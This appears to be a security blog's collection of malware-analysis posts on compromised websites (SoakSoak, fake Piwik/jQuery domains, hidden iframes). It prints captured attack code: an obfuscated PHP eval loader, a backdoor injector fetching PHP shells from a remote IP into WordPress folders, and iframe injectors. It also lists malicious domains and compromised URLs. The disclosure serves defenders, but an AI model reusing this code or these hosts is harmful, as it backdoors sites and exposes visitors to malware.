Tag: Malware Analysis & Compromises

The RevSlider SoakSoak malware campaign started with the soaksoak.ru domain (hence the name). However, since thelast 2 weeks, it has mutated and used different domains as the initial malware intermediary.

This is the full list so far:

1. soaksoak.ru: First one in the list. We identified more than 100,000 sites redirecting to it.
2. 122.155.168.105: Started just after soaksoak, leveraging the /collect.js redirection. Almost 10,000 were blacklisted and compromised with it.
3. ads.akeemdom.com
4. wpcache-blogger.com: Second biggest campaign after soaksoak. More than 50,000 sites compromised and still going.
5. theme.wpcache-blogger.com
6. phoenix-credit.com: Current one active. Also leverages the /collect.js redirection and has compromised more than 11,000 different sites.

We will keep updating this list as the domains change and the attacks mutate.

We woke up this morning to many reports and people asking why the PHP.net site is being blacklisted.We did not get a chance to analyze it while it was compromised, but it seems that one of their javascript files (static.php.net/www.php.net/userprefs.js) was modified to inject a malicious iframefrom http://lnkhere.reviewhdtv.co.uk/stat.htm.

That’s the supposed bad code: http://pastebin.com/raw.php?i=nAess4xL

It seems the PHP team fixed it already and requested Google to clear it. If anyone has more info, we would love to hear it.

Piwik is an open source web analytics software that is used by many web masters. Andthe bad guys are using their popularity to try to make their malware injection harder todetect. They do that by injecting malicious javascript calls from a domain that looks like came from the Piwik project: www.piwik-stat.com/piwik.js. This is what is being injected:

<script src="httx://www.piwik-stat. com/piwik.js..
<iframe src="httx://www.piwik-stat. com/index.html..

It is not an uncommon tactic (we see if often with jquery), but as a web master if you see anythingfrom pwiki-stat or similar variations, it is likely fake. The official (and trusted one)is http://piwik.org/.

I don\’t think we have logged about it lately, but an old infection (that started early this year)is still going strong. The result is this code being injected to the site when visited by certain browsers:

var j=0; while(j<230) 
document.write(String.fromCharCode("=tuzmf?/{q8rcbjsci!|!qptjujpo;bctpmvuf<..
!mfgu;.2396qy#{q8rcbjsci#?=jgsbnf!tsd>#iuuq;00..
ifjhiu>#651#?=0jgsbnf?=0ejw?"
.charCodeAt( j++)-1));

And the hidden code that generates it is tricky to find and generlly hidden inside one of the themefiles or wp-includes (on WordPress sites). It looks like this:

function check_image_c()
{
        $imagepath = array (
  0 => "47 118 97 114 47 119 119 119 47 116 104 111 117 103 104 116 102 117 108 119 111 109 101 110 46',
  1 => "111 114 103 47 119 112 45 99 111 110 116 101 110 116 47 117 112 108 111 97 100 115 47 50 48',
  2 => "49 51 47 48 51 47 117 112 97 110 100 117 112 46 106 112 103',
);
...
        $image = "101 118 97 108 40 98 97 115 101 54 52 95 100 101 99 111 100 101 40 39";
        $image = implode("", array_map("chr", explode(" ", $image)));
        $a = 'pre" . 'g_replace';
        $a("/.*/e", $image . $code . "'));", "");
                return false;
}
check_image_c();

All that to the end goal: Inject an iframe from *no-ip.biz (and other free domains) that will redirect the browser of the victim to Fake AV.

A backdoor injector code we found on a compromised site:

if(is__writable($dir."/wp-includes/")):
        file_put_contentz($dir.'/wp-includes/page.php', get_contentz('http://67.211.195.81/backdoorz/page.php'));
        touch($dir.'/wp-includes/page.php', $time);
        die(";;/wp-includes/page.php;;true_upload");
endif;

if(is__writable($dir."/wp-content/themes/".get_settings('template')."/")){
        file_put_contentz($dir.'/wp-content/themes/'.get_settings('template').'/timthumb.php', get_contentz('http://67.211.195.81/backdoorz/timthumb.php'));
        touch($dir.'/wp-content/themes/'.get_settings('template').'/timthumb.php', $time);
        die(";;/wp-content/themes/".get_settings('template')."/timthumb.php;;true_upload");
}

if(is__writable($dir."/wp-admin/")):
        file_put_contentz($dir.'/wp-admin/options-plugin.php', get_contentz('http://67.211.195.81/backdoorz/wp-plugin.php'));
        touch($dir.'/wp-admin/options-plugin.php', $time);
        die(";;/wp-admin/options-plugin.php;;true_upload");
endif;

if(is__writable($dir."/")):
        file_put_contentz($dir.'/wp-plugin.php', get_contentz('http://67.211.195.81/backdoorz/wp-plugin.php'));
        touch($dir.'/wp-plugin.php', $time);
        die(";;/wp-plugin.php;;true_upload");
endif;

if(is__writable($dir."/wp-content/themes/")){
        file_put_contentz($dir.'/wp-content/themes/theme.php', get_contentz('http://67.211.195.81/backdoorz/page.php'));
        touch($dir.'/wp-content/themes/theme.php', $time);
        die(";;/wp-content/themes/theme.php;;true_upload");
}

if(is__writable($dir."/wp-content/uploads/")){
        file_put_contentz($dir.'/wp-content/uploads/timthumb.php', get_contentz('http://67.211.195.81/backdoorz/timthumb.php'));
        touch($dir.'/wp-content/uploads/timthumb.php', $time);
        die(";;/wp-content/uploads/timthumb.php;;true_upload");
}else{
        die(";;0;;false_upload");

It looks for a writable directly either inside wp-includes, wp-content or inside uploads to inject a backdoor.

Lots of compromised sites redirecting to TDS:

http://1151.website.snafu.de/hkkj.html?h=1475928
http://adaptpro.co.uk/mwhi.html?h=1380448
http://aennekens.de/hozs.html?h=1180315
http://afamontserrat.org/zapn.html?h=877095
http://afhwarranty.us/wmcs.html?h=1235327
http://aklmn.com/mzos.html?h=1216229
http://alghuraba.co.uk/owes.html?h=1364764
http://app.2need.net/hwed.html?h=617164
http://appprices.com/heos.html?h=1168480
http://arlington9to5.com/mccf.html?h=423540
http://ashneh.in/zopn.html?h=841597
http://babylonproduction.com/wmcf.html?h=557620
http://badmintonscreensaver.com/ehai.html?h=1333181
http://bcitec.com/amms.html?h=1232317
http://belve.fr/wzai.html?h=1244948
http://belve.fr/wzpn.html?h=847683
http://bestofbec.com/hkgb.html?h=1507945
http://bestofbec.com/hmgn.html?h=809281
http://biggtimeinc.com/hfis.html
http://bizwonk.com/zcei.html?h=1044231
http://blackfriday-shopping.com/mhhi.html?h=1366273
http://blackpooldesign.de/akkl.html?h=1476799
http://blamebilly.com/zhgu.html?h=992578
http://blamebilly.com/zhzs.html?h=1033872
http://blog.fantasygifts.com/ozaf.html?h=425793
http://bocaraton.isabellascott.com/hmmd.html?h=710618
http://bonadies.com.br/hezd.html?h=1449509
http://bornreadydesign.co.uk/eopu.html?h=1415104
http://buseklaw.com/mhai.html?h=1370845
http://busymomsfitness.org/mjpx.html?h=1507937
http://cdfusa.org/ahpn.html?h=846779
http://celeirodoalgarvio.com/azgn.html?h=856613
http://cib.onthewebhosting.eu/zwed.html?h=489754
http://cifraconsumibles.com/oczs.html?h=1149354
http://cinemamasti.com/edgv.html?h=960530
http://codeweb.cz/wmcf.html?h=719087
http://comfortconnectac.com/zwcd.html?h=965408
http://coverskin.ir/odpl.html?h=962581
http://crosbystreetgallery.com/emos.html?h=1244945
http://csplague.gen.tr/cwzi.html?h=1323098
http://dandbuniforms.com/hecd.html?h=595670
http://dandbuniforms.com/hegu.html?h=854117
http://darwinawards.fr/wami.html?h=1177610
http://dc5intent.com/wcoi.html?h=1163659
http://acme-parts.com/adbr.htm?h=968600
http://acme-parts.com/mdxr.htm?h=983583
http://africanmangoextract4u.com/maes.htm?h=1054006
http://agsolution.com/maes.htm?h=1054006
http://allroemenie.com/chci.htm?h=1154884
http://allroemenie.com/ocgu.htm?h=800432
http://asadbashir.com/aepn.htm?h=841168
http://asadbashir.com/hazi.htm?h=1110359
http://ashleeoakscommunity.com/maes.htm?h=1054006
http://ashleeoakscommunity.com/meci.htm?h=1097292
http://billsarena.com/adbr.htm?h=968600
http://blockoss.com/ocgu.htm?h=800432
http://crossmotion.com/maes.htm?h=1054006
http://crossmotion.com/meci.htm?h=1097292
http://decopersan.com/ccpu.htm?h=1414990
http://eewsonline.com/ccpu.htm?h=1414990
http://eewsonline.com/mhpu.htm?h=1415203
http://hazirlikkitap.com/maes.htm?h=1054006
http://iconmasonry.com/aeoi.htm?h=1118301
http://iconmasonry.com/hagn.htm?h=1397981
http://iconmasonry.com/maes.htm?h=1139554
http://pinnaclecoin.com/ocgu.htm?h=800432
http://termlifepolicys.com/occs.htm?h=1052123
http://tutsaksesli.com/meci.htm?h=1097292
http://vintagebelts.com/aeoi.htm?h=1033082
http://vintagebelts.com/megn.htm?h=836122
http://widetrader.com/aepn.htm?h=841168
http://widetrader.com/hazi.htm?h=1110359
http://widetrader.com/maes.htm?h=1054006
http://widetrader.com/wopu.htm?h=1410598
http://wilddogtraining.com/hazi.htm?h=1056691
http://wildearthfineart.com/eack.htm?h=749606

And that’s just a small sample. We have detected just in February over 500 sites compromised exactly like that.

We keep seeing fake jQuery sites popping up and being used to distributemalware. One was jquerys.org, other was jquery-framework.com and the new oneis jqueryc.com (199.59.241.179).

And this new one seems to be affecting many web sites in the last few days. All of them have the following on their header or index.php files:

window.top.location.href = "httx://www.jqueryc.com"

Which redirects any visitor to the web site to jqueryc.com where it is then sent to other random spammy domains (seems like a TDS is in place).

Update:We are also seeing some sites with this javascript file being included: http://www.jqueryc.com/jquery-1.6.3.min.js, which just redirects back to jqueryc.com via the same window.top.location.href in javascript.

*Note that the domain was just registered (20-nov-2012), so it is not being flagged anywhere.

**The official jquery sites are jquery.org or jquery.com. Other variations are likely fake.

It seems that the .co.cc (sub TLD) that used to be mass used byspammers and malware is now gone.Their registration page is offline:

$ host co.cc
Host co.cc not found: 3(NXDOMAIN)

$ host www.co.cc
Host www.co.cc not found: 3(NXDOMAIN)

And we hope it stays that way.

If your site is loading hidden iframes from *.ftp1.biz/pony, look for a curlor file_get_contents call to http://wordpresstest2.info/1.txt.When you visit this site, it generates random iframes:

http://lsghmr.ftp1.biz/pony ( 206.212.240.20)
http://rchscbul.ftp1.biz/pony ( 206.212.240.20)
http://idzui.ftp1.biz/pony
http://vtfptnmxk.ftp1.biz/pony

That are displayed on the compromised sites.

We are seeing a large number of sites compromised with an iframe pointing to http://fenwaywest.com/media/index.php .Just in the last 3 days, we identified almost 10,000 sites with it:

2012/Oct/11 - 4393 sites - http://fenwaywest.com/media/index.php
2012/Oct/10 - 3117 sites - http://fenwaywest.com/media/index.php
2012/Oct/09 -  865 sites - http://fenwaywest.com/media/index.php

On all the compromised sites have the iframes similar to this one:

<script> function frmAdd() { var ifrm = document.createElement("iframe"); ifrm. style.position="absolute'; ifrm.style.top='-999em'; ifrm.style.left='-999em';  ifrm.src = "http://fenwaywest.com/media/index.php";ifrm.id = 'frmId';document.body. appendChild (ifrm);};window.onload = frmAdd;..

The domain is hosted at 50.28.53.157, but currently offline (redirecting to Google), so we can\’t really tell what it is doing. But on previous requests, it was redirecting to a TDS (traffic distribution system) and from there, being sent to multiple spam or malicious domains.